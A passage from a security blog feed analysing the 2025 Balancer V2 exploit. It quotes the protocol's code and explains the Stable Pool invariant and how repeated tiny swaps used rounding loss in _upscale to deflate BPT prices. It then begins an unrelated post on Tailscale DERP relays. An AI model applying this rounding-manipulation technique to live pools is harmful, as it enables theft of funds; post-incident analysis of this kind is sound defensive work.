function_">_getScalingFactor</span>(i).<span class="title function_">mulDown</span>(<span class="title function_">_getTokenRate</span>(i)); <span class="comment">// &lt;---</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> scalingFactors;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>However, analyzing only up to this point is not enough. The core issue of the attack incident is not here. First, <strong>although when the _upscale amount parameter is a very small value like 9, we can indeed see obvious precision loss, the logical meaning of this small value 9 is just 9 wei</strong>. If an attacker only steals 1 wei per swap, that money wouldn’t even be enough to pay for the gas fee of a single swap. This is probably why the _upscale developers believed the impact would be minimal. Second, the logic of multiplying by tokenRate in the _scalingFactors calculation process is also not problematic, because Linear Pool has similar logic, but Linear Pool is not within the scope of this attack:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-linear/contracts/LinearPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactor</span>(<span class="params">IERC20 token</span>) internal view virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">if</span> (token == _mainToken) &#123;</span><br><span class="line">        <span class="keyword">return</span> _scalingFactorMainToken;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == _wrappedToken) &#123;</span><br><span class="line">        <span class="comment">// The wrapped token&#x27;s scaling factor is not constant, but increases over time as the wrapped token</span></span><br><span class="line">        <span class="comment">// increases in value.</span></span><br><span class="line">        <span class="keyword">return</span> _scalingFactorWrappedToken.<span class="title function_">mulDown</span>(<span class="title function_">_getWrappedTokenRate</span>()); <span class="comment">// &lt;--------</span></span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == <span class="variable language_">this</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="property">ONE</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>So where is the problem??? It’s time to learn about the Stable Pool’s mathematical model.</strong></p><h3 id="2-Stable-Pool-Mathematical-Model">2. Stable Pool Mathematical Model</h3><blockquote><p>This section introduces the Stable Pool’s mathematical model. For learning purposes, it involves additional background knowledge, and not all content is related to the vulnerability.</p></blockquote><p>During the swap process, the control flow will enter the specific swap share calculation logic through the call chain <code>BaseGeneralPool._swapGivenOut → ComposableStablePool._onSwapGivenOut → ComposableStablePool._onRegularSwap</code>:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Perform a swap between non-BPT tokens. Scaling and fee adjustments have been performed upstream, so</span></span><br><span class="line"><span class="comment"> * all we need to do here is calculate the price quote, depending on the direction of the swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_onRegularSwap</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bool isGivenIn,</span></span><br><span class="line"><span class="params">    uint256 amountGiven,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut</span></span><br><span class="line"><span class="params"></span>) private view <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Adjust indices and balances for BPT token</span></span><br><span class="line">    uint256[] memory balances = <span class="title function_">_dropBptItem</span>(registeredBalances);</span><br><span class="line">    uint256 indexIn = <span class="title function_">_skipBptIndex</span>(registeredIndexIn);</span><br><span class="line">    uint256 indexOut = <span class="title function_">_skipBptIndex</span>(registeredIndexOut);</span><br><span class="line"></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line">    uint256 invariant = <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (isGivenIn) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcOutGivenIn</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcInGivenOut</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here we can see several functions used to calculate shares:</p><ul><li>_getAmplificationParameter: Gets the amplification factor, which is a hyperparameter that can be smoothly modified by administrators over time</li><li>_calculateInvariant: Calculates the invariant D</li><li>_calcOutGivenIn/_calcInGivenOut: Based on the previously calculated invariant D and the token exchange direction, calculates how many tokenOut can be exchanged for amountGiven tokenIn</li></ul><p>For Automated Market Makers (AMM), they generally need to follow the mathematical formula $f(\mathbf{B}^{\text{prev}}; \boldsymbol{\theta})=f(\mathbf{B}^{\text{after}}; \boldsymbol{\theta})=D$ to ensure that token exchange prices can automatically adjust with trades.</p><blockquote><p>Where $\mathbf{B} = (B_1, B_2,…)$ represents the balances of multiple tokens (<strong>note that the balances here are values after multiplying by Token Rate</strong>), $\boldsymbol{\theta}=(\theta_1,\theta_2,…)$ represents hyperparameters (the AmplificationParameter above is a hyperparameter), and $D$ is the invariant of the formula. Token balance changes maintain price stability through the invariant.</p></blockquote><p>Different token pairs have different price behaviors and risk characteristics, so the invariant function f also needs to vary with market structure. For Stable Pools, since stablecoin exchange relationships are usually maintained at fixed ratios over the long term, such as 1:1, it’s natural to want the pool to have as much liquidity depth as possible near this price critical point, so that even large-scale trades won’t cause significant price volatility, thereby reducing slippage and improving trading experience. At the same time, when prices significantly deviate from this fixed ratio, prices must have sufficient sensitivity so that the cost of continuing to trade rises rapidly, preventing one side of assets from being over-drained and providing arbitrageurs with motivation to restore price anchoring. The effect is roughly like this:</p><ul><li><p><strong>Price-Liquidity Chart</strong>: We can see that liquidity is very high near price 1.0, because stablecoin price movements themselves are extremely slight; liquidity at distant prices is relatively lower.</p><p><img src="/2025/11/balancer-128m-exploit-analysis/price-liquidity.png" alt="price-liquidity.png"></p></li><li><p><strong>TokenA Liquidity-TokenB Liquidity Chart</strong> (50/50 Stable Pool): Roughly the effect of the orange line in the chart, approaching a constant sum line near 0.5, and approaching a constant product line in extreme situations.</p><blockquote><p>The chart was drawn with ChatGPT, so this chart is just to give readers a general impression and expected understanding, and the mathematical formulas should not be scrutinized in detail.</p></blockquote><p><img src="/2025/11/balancer-128m-exploit-analysis/reservePrice.png" alt="reservePrice.png"></p></li></ul><p>Therefore, <strong>the invariant function adopted by Stable Pool is not simply a constant sum model or constant product model</strong>, but rather achieves a continuous transition between the two by introducing hyperparameters such as amplification factors:</p><ul><li>When prices are near the anchoring interval, its behavior is closer to the constant sum curve x + y = k, providing nearly stable exchange rates</li><li>As prices gradually deviate from this interval, the invariant function gradually degenerates toward the constant product curve x * y = k, making the price curve steeper and strengthening the system’s safety and robustness in extreme situations</li></ul><p>The <code>_calculateInvariant</code> function maintains such an invariant formula, where:</p><p>$$A n^{n} S + D = A D n^{n}+\frac{D^{n+1}}{n^{n} P},\quad S = \sum_{i=1}^{n} x_i,; P = \prod_{i=1}^{n} x_i $$</p><ul><li>A: <strong>Amplification factor</strong>, a hyperparameter.</li><li>n: <strong>Total number</strong> of tokens.</li><li>S: <strong>Sum</strong> of all token balances.</li><li>P: <strong>Product</strong> of all token balances.</li><li>D: The <strong>invariant</strong> mentioned above that needs to be maintained during token swaps, <strong>the value to be calculated</strong>.</li></ul><blockquote><p>Note: The mathematical formulas here are not related to the vulnerability exploitation. Readers who are not interested can skip this.</p></blockquote><p>Thus, if:</p><ul><li><strong>Pool is near equilibrium</strong>: For example, when all balances satisfy $x_i \approx \frac{D}{n}$, we have $P \approx \left(\frac{D}{n}\right)^n$. At this point, the term amplified by A dominates the equation, and the solution approaches $D \approx S$, thus obtaining $x_1 + x_2 + \cdots + x_n \approx D$. This indicates that near the anchoring price, the pool’s behavior is close to the constant sum model, with an almost linear price curve and minimal slippage, corresponding to high liquidity and price stability regions.</li><li><strong>A token balance approaches zero</strong>: For example, $x_k \to 0$, then $P = \prod_{i=1}^{n} x_i \to 0$. At this point, the term $\frac{D^{n+1}}{n^{n} P}$ becomes extremely large and dominates the entire equation, making it approximately satisfy $D^{n+1} \propto P$, thus degenerating to constant product-like behavior in boundary regions, where prices change drastically with trading volume, slippage increases rapidly, effectively preventing a single asset from being completely drained.</li></ul><p>In the invariant formula in the <code>_calculateInvariant</code> function above, <strong>the independent variables are the balances of each token, and the dependent variable is the invariant D.</strong> To calculate D, the <code>_calculateInvariant</code> function uses the Newton–Raphson iteration formula $D_{k+1} = D_k - \frac{f(D_k)}{f’(D_k)}$ to perform up to 256 iterations to calculate the D value. More specific mathematical details won’t be expanded here; interested readers can consult ChatGPT for more explanations.</p><p>After calculating the invariant D, the <code>_calcInGivenOut</code> function transforms based on the above invariant formula to obtain the following new formula $x^2 + \left( S_{\setminus x} + \frac{D}{A \cdot n^n} - D \right) x - \frac{D^{,n+1}}{A \cdot n^{2n} \cdot P_{\setminus x}} = 0$ and attempts to solve for variable x. Where:</p><ul><li>$x$: Represents the <strong>new balance of tokenIn after tokenIn flows in (i.e., $x=B_x + Amount_{in}$</strong>, and this $Amount_{in}$ is the value that <code>_calcInGivenOut</code> ultimately needs to find). <strong>The value to be calculated</strong>.</li><li>$S_{\setminus x}$: Represents the sum of balances of all other tokens except tokenX.</li><li>$P_{\setminus x}$: Represents the product of balances of all other tokens except tokenX.</li></ul><p>In this way, after calculating the expected new balance of tokenIn, subtracting the current balance yields the expected tokenIn amount $Amount_{in}$ that the user should input.</p><p><strong>So how is the BPT price calculated?</strong> It can be seen that <strong>BPT price is positively correlated with the invariant D</strong>, conforming to $P_{BPT} = \frac{D}{S_{BPT}}$, where $P_{BPT}$ is the BPT price and $S_{BPT}$ is the total supply of BPT. However, note that although D is called an invariant, it doesn’t mean it’s unchanging. See the code comments below for details, which won’t be expanded here.</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function returns the appreciation of BPT relative to the underlying tokens, as an 18 decimal fixed</span></span><br><span class="line"><span class="comment"> * point number. It is simply the ratio of the invariant to the BPT supply.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The total supply is initialized to equal the invariant, so this value starts at one. During Pool operation the</span></span><br><span class="line"><span class="comment"> * invariant always grows and shrinks either proportionally to the total supply (in scenarios with no price impact,</span></span><br><span class="line"><span class="comment"> * e.g. proportional joins), or grows faster and shrinks more slowly than it (whenever swap fees are collected or</span></span><br><span class="line"><span class="comment"> * the token rates increase). Therefore, the rate is a monotonically increasing function *as long as the tokens</span></span><br><span class="line"><span class="comment"> * in the pool do not lose value*.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * ...</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">getRate</span>(<span class="params"></span>) external view virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// We need to compute the current invariant and actual total supply. The latter includes protocol fees that have</span></span><br><span class="line">    <span class="comment">// accrued but are not yet minted: in calculating these we&#x27;ll actually end up fetching most of the data we need</span></span><br><span class="line">    <span class="comment">// for the invariant.</span></span><br><span class="line"></span><br><span class="line">    (</span><br><span class="line">        uint256[] memory balances,</span><br><span class="line">        uint256 virtualSupply,</span><br><span class="line">        uint256 protocolFeeAmount,</span><br><span class="line">        uint256 lastJoinExitAmp,</span><br><span class="line">        uint256 currentInvariantWithLastJoinExitAmp</span><br><span class="line">    ) = <span class="title function_">_getSupplyAndFeesData</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Due protocol fees will be minted at the next join or exit, so we can simply add them to the current virtual</span></span><br><span class="line">    <span class="comment">// supply to get the actual supply.</span></span><br><span class="line">    uint256 actualTotalSupply = virtualSupply.<span class="title function_">add</span>(protocolFeeAmount);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// All that&#x27;s missing now is the invariant. We have the balances required to calculate it already, but still</span></span><br><span class="line">    <span class="comment">// need the current amplification factor.</span></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// It turns out that the process for due protocol fee calculation involves computing the current invariant,</span></span><br><span class="line">    <span class="comment">// except using the amplification factor at the last join or exit. This would typically not be terribly useful,</span></span><br><span class="line">    <span class="comment">// but since the amplification factor only changes rarely there is high probability of its current value being</span></span><br><span class="line">    <span class="comment">// the same as it was in the last join or exit. If that is the case, then we can skip the costly invariant</span></span><br><span class="line">    <span class="comment">// computation altogether.</span></span><br><span class="line">    uint256 currentInvariant = (currentAmp == lastJoinExitAmp)</span><br><span class="line">        ? currentInvariantWithLastJoinExitAmp</span><br><span class="line">        : <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// With the current invariant and actual total supply, we can compute the rate as a fixed-point number.</span></span><br><span class="line">    <span class="keyword">return</span> currentInvariant.<span class="title function_">divDown</span>(actualTotalSupply);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-Attack-Flow">3. Attack Flow</h3><p>In the first subsection, we mentioned that if a very small value is passed to the _upscale function, the calculation result will have significant precision loss, but we still <strong>haven’t figured out how to steal large amounts of funds through this tiny value of a few wei</strong>. In the second subsection, we learned in detail about the Stable Pool’s invariant formula and how BPT prices are calculated.</p><p>Let’s review:</p><ol><li>The Stable Pool’s mathematical model manifests as a combination of constant sum and constant product, i.e., it behaves as x + y = k near the anchoring price, and <strong>as x * y = k at positions far from the anchoring price</strong>.</li><li>The invariant D is calculated from each token’s balance, so <strong>the invariant D must be positively correlated with each token’s balance</strong>. This is easy to prove: when LPs inject liquidity, token balances increase, so D must also increase to correspond to newly minted BPT. Conversely, if LPs withdraw liquidity, token balances decrease, and D should also decrease accordingly.</li><li><strong>BPT price is derived from the invariant D and the current total supply</strong>. If the total supply remains unchanged and D can be reduced through the vulnerability, then BPT can be exchanged at a price lower than normal.</li></ol><p>The attack idea then becomes gradually clear: <strong>During each Swap, the invariant D is calculated from token balances. If the precision loss in this subtle token balance calculation can cause the calculated invariant D to be compressed (under the premise that BPT total supply remains unchanged), then attackers can purchase BPT at a lower price, because BPT price is directly affected by the invariant D</strong>.</p><p>The <a href="https://app.blocksec.com/explorer/tx/arbitrum/0x7da32ebc615d0f29a24cacf9d18254bea3a2c730084c690ee40238b1d8b55773">example attack transaction on Arbitrum</a> shows the full attack flow. We can see that the attacker exploited the precision loss in the _upscale function to cause D’s calculation to deviate from normal values, thereby affecting BPT prices to carry out the attack. Specifically, the attack flow is as follows.</p><ol><li><p><strong>Liquidity Manipulation</strong>. Balancer batchSwap allows temporarily borrowing internal balances, so the attacker first borrowed BPT from this Pool in Balancer, then used these BPT to exchange for underlying asset tokens like rETH/cbETH/wstETH. This reduced tokens that originally had balances on the order of 1e18 to only 1e11 levels in the pool after extensive exchanges:</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image.png" alt="image.png"></p><p>In the figure above, the TokenIn labeled <code>wstETH/rETH/cbETH</code> is actually the BPT of this pool (because the BPT address is the pool’s address). From the figure, we can see that from top to bottom, the order of magnitude of each exchange of underlying assets decreases sequentially, until the final swap amount is below 100 wei. Looking at balance changes, the token amounts at the start of the swap were:</p><ul><li><strong>cbETH: 385e18</strong> (385,331,897,945,415,101,145)</li><li><strong>BPT: 2.45e18</strong> + 2^11 (2,596,148,429,267,416,263,499,288,948,276,786)</li><li><strong>wstETH: 36.4e18</strong> (36,378,350,238,858,588,950)</li><li><strong>rETH: 41.3e18</strong> (41,301,528,246,890,260,702)</li></ul><blockquote><p>Note: The 2^11 portion in the BPT balance is <code>_PREMINTED_TOKEN_BALANCE</code>, see code for details.</p></blockquote><p>After completing liquidity manipulation, the final token amounts were:</p><ul><li><strong>cbETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>BPT: 501.96e18</strong> + 2^11 (2,596,148,429,267,915,775,463,860,923,420,341)</li><li><strong>wstETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>rETH: 1.00e11</strong> (100,000,000,000)</li></ul></li><li><p>Frequently compressing the invariant D through rounding vulnerabilities. This step only involves wstETH/cbETH trading. The attacker achieves this by repeatedly performing the following swap steps:</p><ol><li>wstETH→cbETH: This step exhausts wstETH liquidity, reducing liquidity from the higher 1e11 to the critical value of 9.</li><li><strong>wstETH→cbETH: This step uses a carefully constructed amount = 8, triggering precision loss in upscale.</strong> At this point, cbETH’s token rate is 1.114. Therefore, before calculating the invariant D, upscale will calculate <code>balance(8) * rate(1.114) = value(8.912)</code> and truncate it to <strong>8</strong>. In this way, when calculating the invariant D, since the token balance used is the truncated value, the calculated D value will be maliciously compressed downward.</li><li>cbETH→wstETH: After completing the previous step to compress D downward, this swap step just restores wstETH liquidity from 1 to a higher value like 5642, preparing for the next execution of step a.</li></ol><p><img src="/2025/11/balancer-128m-exploit-analysis/image%201.png" alt="image.png"></p></li><li><p>Since the invariant D has been compressed very small through multiple rounding attacks, the attacker can repurchase BPT at a lower price to repay the internal balances borrowed from the Vault’s batchSwap. The price difference of BPT before and after is the key to the amount stolen by the attacker. The figure below shows the transaction process where the attacker spends underlying tokens cbETH/wstETH/rETH to repurchase BPT. Here, the attacker’s BPT repurchase amount increases exponentially each time, used to quickly repurchase the BPT that was initially borrowed from the Vault to deplete the Pool’s liquidity.</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image%202.png" alt="image.png"></p></li></ol><h2 id="IV-References">IV. References</h2><ol><li><a href="https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/">https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/</a></li><li><a href="https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437">https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437</a></li><li><a href="https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit">https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit</a></li><li><a href="https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw">https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw</a></li><li><a href="https://x.com/Balancer/status/1986104426667401241">https://x.com/Balancer/status/1986104426667401241</a></li></ol></div><script>// 获取 URL 参数function getUrlParameter(name) {  name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');  var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');  var results = regex.exec(location.search);  return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));}// 更新 URL 参数（不刷新页面）function updateUrlParameter(param, value) {  var url = new URL(window.location);  url.searchParams.set(param, value);  window.history.replaceState({}, '', url);}function switchLang(lang, updateUrl) {  const zhContent = document.getElementById('content-zh');  const enContent = document.getElementById('content-en');  const zhBtn = document.getElementById('lang-zh');  const enBtn = document.getElementById('lang-en');    if (lang === 'zh') {    zhContent.style.display = 'block';    enContent.style.display = 'none';    zhBtn.style.background = '#007bff';    enBtn.style.background = '#6c757d';    localStorage.setItem('preferred-lang', 'zh');  } else {    zhContent.style.display = 'none';    enContent.style.display = 'block';    zhBtn.style.background = '#6c757d';    enBtn.style.background = '#007bff';    localStorage.setItem('preferred-lang', 'en');  }    // 更新 URL 参数（如果指定要更新）  if (updateUrl !== false) {    updateUrlParameter('lang', lang);  }    // 重新生成 TOC（如果 TOC 功能已启用）  if (typeof window.initTocbot === 'function') {    setTimeout(function() {      window.initTocbot();    }, 100);  }}// 页面加载时恢复用户的语言选择document.addEventListener('DOMContentLoaded', function() {  // 优先级：URL 参数 > localStorage > 默认值（中文）  var urlLang = getUrlParameter('lang');  var savedLang = localStorage.getItem('preferred-lang');  var defaultLang = 'zh';    var langToUse = urlLang || savedLang || defaultLang;    // 验证语言参数是否有效  if (langToUse !== 'zh' && langToUse !== 'en') {    langToUse = defaultLang;  }    // 如果 URL 中有参数，同步到 localStorage  if (urlLang && (urlLang === 'zh' || urlLang === 'en')) {    localStorage.setItem('preferred-lang', urlLang);  }    // 切换语言（不更新 URL，因为已经在 URL 中或不需要更新）  switchLang(langToUse, false);});</script>]]></content>
    
    
    <summary type="html">&lt;div class=&quot;lang-switcher&quot; style=&quot;text-align: center; margin: 20px 0;&quot;&gt;
  &lt;button id=&quot;lang-zh&quot; onclick=&quot;switchLang(&#39;zh&#39;)&quot; style=&quot;padding: 8px 16px; margin: 0 5px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer;&quot;&gt;中文&lt;/button&gt;
  &lt;button id=&quot;lang-en&quot; onclick=&quot;switchLang(&#39;en&#39;)&quot; style=&quot;padding: 8px 16px; margin: 0 5px; background: #6c757d; color: white; border: none; border-radius: 4px; cursor: pointer;&quot;&gt;English&lt;/button&gt;
&lt;/div&gt;
&lt;div id=&quot;content-zh&quot; class=&quot;lang-content lang-content-zh&quot; style=&quot;display: block;&quot;&gt;
&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;2025年11月3日，攻击者利用 balancer 池不变式计算中的算术精度损失，在不到 30 分钟的时间内，从六个区块链网络中窃取了 1.28 亿美元。&lt;/strong&gt; 我对这个攻击非常感兴趣，但是现有的网上的文章大多在描述极其有限的技术细节，例如 _upscaleArray 相关逻辑的精度丢失又或者是相邻一两层的调用链，对于尚未了解过 balancer 具体细节的读者不太友好。因此想好好整理一下全部相关细节并趁机学习一下 balancer 协议。&lt;/p&gt;&lt;/div&gt;</summary>
    
    
    
    
    <category term="Blockchain" scheme="https://kiprey.github.io/tags/Blockchain/"/>
    
    <category term="exploit" scheme="https://kiprey.github.io/tags/exploit/"/>
    
  </entry>
  
  <entry>
    <title>浅探 Tailscale DERP 中转服务</title>
    <link href="https://kiprey.github.io/2023/11/tailscale-derp/"/>
    <id>https://kiprey.github.io/2023/11/tailscale-derp/</id>
    <published>2023-11-13T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.129Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>tailscale 是一个很好用的工具，它包含了多种高级特性（例如 Magic DNS）来方便用户的使用，主要用于异地组网。</p><blockquote><p>这也是本人抛弃 Zerotier 选择 Tailscale 的缘故，高级特性很多用的很方便。</p></blockquote><p>tailscale 的底层机制与 zerotier 不同。</p><ul><li>zerotier 会让每个客户端在<strong>启动时立即尝试与其他客户端的打洞</strong>，并一直维持这个连接。<ul><li>优点：创建链接时可以非常快速。要么早已打洞完成，要么就是百分百确定走中继节点。</li><li>缺点：需要维护与所有对等节点的打洞链接，占用资源。节点一多则维护打洞的开销就比较大。</li></ul></li><li>tailscale 只会在<strong>需要与 peer 建立连接的时候才会尝试打洞</strong>，而且最开始的流量一定是会经过 DERP 中转服务器。（非常的 Lazy…）<ul><li>优点：懒加载机制无需预先维护与其他节点的任何打洞连接，无需预先维护任何状态。</li><li>缺点：每次通过 tailscale 创建虚拟连接时，<strong>初始所创建的连接其延迟很高</strong>，这会极大的影响使用体验；<strong>tailscale 极其依赖中继节点</strong>。</li></ul></li></ul><p>而在 P2P VPN 中，<strong>自建中继节点</strong>是相当重要的。一方面自建中继节点可以比地理位置较远的官方中继节点<strong>更好的观察和协调本地两台对等机的 p2p 过程</strong>，另一方面可以在打洞失败后<strong>快速中继和转发流量</strong>。</p><p>本人先前的文章已经介绍了 Zerotier 搭建中继节点 Moon 的原理和过程。Zerotier 会在特定 Primary Port 9993 上监听 UDP 连接来中继数据，因此在实际搭建的过程中<strong>只需将这一个 UDP 端口暴露至公网即可</strong>，要求极低。而暴露端口有多种方式可以实现，例如内网穿透 FRP 等等，也因此 <em>moon 节点甚至都不需要有一个属于自己 IP 地址</em>。</p><blockquote><p>注：Zerotier 不支持自建 TCP 中继，moon 节点实际上只是一个 UDP 中继节点。</p></blockquote><p>而 Tailscale 的中继服务器（称为 DERP 服务）的搭建与 zerotier 相比存在一点困难，而网络上的搭建教程真是参差不齐（跟我之前找 Zerotier Moon 的搭建过程一样难顶，这点要狠狠吐槽一下）。那么接下来，我们来尝试找到一种最简便的方式来构建 tailscale DERP 服务器，顺带学习一下 DERP 服务的一些原理。</p><blockquote><p>Tailscale 的中继 DERP 服务就是一个 <strong>TCP</strong> 中继节点，与 Zerotier 完全相反。</p></blockquote><p><strong>TL,DR</strong>: 如想跳过前置内容，直接快速了解搭建过程，请直接跳转至本文最后一节的<strong>总结部分</strong>。</p><p>看完本文，你将了解到<strong>无需公网机器、无需域名、无需证书、无需修改源代码、无需自托管 HeadScale 服务</strong>的情况下，<strong>只需1-2个端口</strong>，来快速构建 Tailscale-DERP 服务。</p><blockquote><p>需要注意的是本篇文章只考虑 tailscale 而不考虑 headscale，因为我希望使用的过程中能够尽可能简便，不想单独部署一个 headscale 控制服务器。</p></blockquote><span id="more"></span><h2 id="二、初探-DERP-服务的初始要求">二、初探 DERP 服务的初始要求</h2><p><a href="https://tailscale.com/kb/1118/custom-derp-servers/#why-run-your-own-derp-server">Tailscale 官方文档</a>说明了 DERP 服务器需要满足一些要求：</p><ol><li><p><strong>需要能够公网访问</strong>。这是为了让各个 Tailscale 节点可以直接访问到该 DERP 服务器，以此来便于进行后续的流量转发等操作。这个要求非常正常。</p></li><li><p><strong>需要运行 HTTPS 服务</strong>。本质上是为了在传输数据给 DERP 服务器时数据可以通过 TLS 加密。</p><blockquote><p>HTTPS 服务通常需要 <strong>带有一个 TLS 证书</strong>。DERP 服务器只认 <em>Let‘ s Encrypt</em> 这家服务商颁发的证书，但该服务商不会给纯 IP 的服务器颁发证书。这实际上就隐含了一个条件：<strong>还需要一个公共域名</strong>。</p></blockquote><blockquote><p>这里的 TLS 加密和 Tailscale P2P 加密不同，前者是加密 peer to server 的流量，后者是加密 peer to peer 的流量。换句话说，TLS 要加密的数据中会包含（已经被 tailscale peer 加密过的）<em>待中继加密流量</em>。</p></blockquote></li><li><p><strong>必须分配 80 端口来运行 HTTP 服务</strong>。这个要求很强烈，限制死了端口。</p></li><li><p><strong>需要额外暴露两个端口来运行 HTTPS 和 STUN 服务</strong>。</p></li><li><p><strong>必须允许 ICMP 流量的出入</strong>。Tailscale Document 中用的是 <em>must</em> 来指定其重要性，但个人感觉应该是不需要这个要求。</p></li></ol><p>上面从文档中总结出来的几点要求可能不太准确，因为网络中有部分文章介绍了搭建纯 IP DERP 服务器的过程（但是还是什么介绍都没有，看了跟没看没什么两样……）。不过从我阅读代码得到的经验看来<strong>官方文档上这方面内容很有可能已经过时，实际应该不需要这么强的要求</strong>。</p><p>需要注意的是 DERP 服务要求服务器上需要携带 TLS 证书主要还是出于数据加密的目的；但在 Tailscale 节点中，两个节点在传输数据前会使用各个节点事先已经上传至 Tailscale 中心节点（即协调服务器）里的公钥来做加密。因此，DERP服务器要求的 TLS 证书的实际作用是为了<strong>隐藏数据转发的这个行为本身</strong>。由于本人自建节点主要是自己使用，因此这个隐藏就显得比较无所谓。</p><p>那么这样一来就有一个有意思的问题：</p><blockquote><p>能否在<strong>最少操作、最少要求</strong>的情况下来做 DERP 中继？</p></blockquote><p>那这就要深入到 DERP 的实现原理了。</p><h2 id="三、初探-DERP-原理">三、初探 DERP 原理</h2><blockquote><p>当前使用的 tailscale 版本为 v1.52.1 